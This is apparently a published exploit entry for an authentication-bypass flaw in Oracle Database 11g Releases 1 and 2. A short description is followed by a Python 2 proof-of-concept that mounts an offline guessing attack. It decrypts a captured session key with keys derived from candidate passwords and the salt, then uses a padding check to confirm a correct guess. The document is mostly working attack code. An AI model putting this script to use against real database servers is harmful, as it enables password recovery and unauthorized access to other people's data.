Oracle Database Authentication Protocol Security Bypass

Oracle Database is prone to a remote security-bypass vulnerability that affects the authentication protocol.
 
An attacker can exploit this issue to bypass the authentication process and gain unauthorized access to the database.
 
This vulnerability affects Oracle Database 11g Release 1 and 11g Release 2.
 
 
     # -*- coding: utf8 -*-
     # Python 2 script; uses the Crypto package (PyCrypto) for AES.

     import hashlib
     from Crypto.Cipher import AES

     def decrypt(session, salt, password):
         pass_hash = hashlib.sha1(password + salt)

         # Pad the 20-byte SHA-1 digest with zero bytes to a 24-byte AES key
         key = pass_hash.digest() + '\x00\x00\x00\x00'
         # No IV is passed; the check below reads only the last block,
         # which in CBC mode does not depend on the IV
         decryptor = AES.new(key, AES.MODE_CBC)
         plain = decryptor.decrypt(session)
         return plain

     # Encrypted session key, 48 bytes
     session_hex = 'EA2043CB8B46E3864311C68BDC161F8CA170363C1E6F57F3EBC6435F541A8239B6DBA16EAAB5422553A7598143E78767'

     # Salt, 10 bytes
     salt_hex = 'A7193E546377EC56639E'

     passwords = ['test', 'password', 'oracle', 'demo']

     for password in passwords:
         session_id = decrypt(session_hex.decode('hex'), salt_hex.decode('hex'), password)
         print 'Decrypted session_id for password "%s" is %s' % (password, session_id.encode('hex'))
         # A correct guess leaves 8 bytes of 0x08 padding after the 40-byte session key
         if session_id[40:] == '\x08\x08\x08\x08\x08\x08\x08\x08':
             print 'PASSWORD IS "%s"' % password
             break